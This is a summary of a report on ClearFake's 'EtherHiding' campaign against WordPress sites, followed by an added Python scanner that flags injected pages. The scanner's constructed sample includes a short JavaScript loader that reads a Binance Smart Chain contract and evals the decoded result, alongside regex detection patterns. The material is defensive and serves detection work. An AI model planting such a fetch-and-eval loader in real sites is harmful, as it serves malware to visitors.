BleepingComputer reports that the ClearFake threat operation has been concealing malicious scripts for compromising WordPress sites in the blockchain, using a new code-distribution technique dubbed EtherHiding that leverages the Binance Smart Chain (BSC) in a bid to better evade detection.
Vulnerable WordPress sites have been targeted with script injections that load the BSC JS library, which then retrieves malicious scripts stored in the blockchain and injects them into the page before prompting third-stage payload downloads from the command-and-control server, a report from Guardio Labs revealed. These payloads display fraudulent site overlays urging browser updates; clicking one redirects to a site that serves a malicious executable.
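The chain described above (injected script loads a blockchain JS library, reads a contract, decodes the result and executes it) leaves indicators in the page source that a site owner can scan for. The following is an added example, not code from Guardio Labs, BleepingComputer or ClearFake: a small heuristic scanner that checks WordPress page HTML for the combination of a web3-style library include, a BSC RPC endpoint, a contract read call, hex-to-text decoding and dynamic code execution. The sample pages are constructed, the library filename and contract address are placeholders, and `bsc-dataseed.binance.org` is used as an assumed example of a public BSC RPC host; a legitimate dApp page could trip these too, so the score is a triage signal for a site that has no reason to talk to a blockchain, not proof of compromise.

```python
import re

# Constructed sample: what an injected page might look like (placeholder URLs/address).
INJECTED_PAGE = """<html><head>
<script src="https://cdn.example.test/web3.min.js"></script>
<script>
const w3 = new Web3("https://bsc-dataseed.binance.org/");
const c = new w3.eth.Contract(ABI, "0x0000000000000000000000000000000000000000");
c.methods.get().call().then(r => eval(w3.utils.hexToAscii(r)));
</script></head><body>Welcome</body></html>"""

# Constructed sample: an ordinary WordPress page with only its bundled jQuery.
CLEAN_PAGE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body>Welcome</body></html>"""

# Each indicator is one link in the EtherHiding-style chain the report describes.
INDICATORS = [
    # A script tag pulling in a web3-style client library (filename is an assumption).
    ("loads_web3_library", re.compile(r"<script[^>]*\bsrc=[\"'][^\"']*web3[^\"']*[\"']", re.I)),
    # A Binance Smart Chain RPC endpoint (assumed public host pattern).
    ("bsc_rpc_endpoint", re.compile(r"bsc-dataseed[\w-]*\.binance\.org", re.I)),
    # A read-only contract call: payload is fetched from chain state, not from a URL.
    ("contract_read_call", re.compile(r"\.methods\.\w+\([^)]*\)\.call\(", re.I)),
    # Hex-encoded contract return value decoded back to text.
    ("hex_decode", re.compile(r"hexTo(Ascii|Utf8|String)", re.I)),
    # Decoded text is turned into executable code.
    ("dynamic_exec", re.compile(r"\beval\(|new\s+Function\(|document\.write\(", re.I)),
]


def matched_indicators(html: str) -> list[str]:
    """Return the names of all indicators found in the page source."""
    return [name for name, pattern in INDICATORS if pattern.search(html)]


def is_suspicious(html: str, threshold: int = 3) -> bool:
    """Flag a page when enough links of the chain appear together.

    A single hit (e.g. a web3 library on a crypto-themed site) is weak evidence;
    library + chain endpoint + contract read + decode/exec together is the
    pattern worth a manual look.
    """
    return len(matched_indicators(html)) >= threshold


def scan_pages(pages: dict[str, str]) -> dict[str, list[str]]:
    """Scan several pages (name -> HTML) and return only the suspicious ones."""
    return {name: matched_indicators(html)
            for name, html in pages.items() if is_suspicious(html)}


if __name__ == "__main__":
    for name, hits in scan_pages({"injected": INJECTED_PAGE,
                                  "clean": CLEAN_PAGE}).items():
        print(f"{name}: suspicious, indicators={hits}")
```

In practice the same regexes can be run over the rendered HTML of each post and over theme and plugin PHP files, since the injection the report describes lives in the site's own pages rather than in a separate malware file; any hit on a site with no wallet or dApp functionality warrants comparing the files against a clean copy of the theme.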
ClearFake adopted this technique after spending the past two months using various hijacked WordPress sites to serve malicious injections through Cloudflare Worker hosts.
"While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they've quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder than ever to detect and take down," said Guardio Labs.
Malicious blockchain scripts concealed with Binance Smart Chain abuse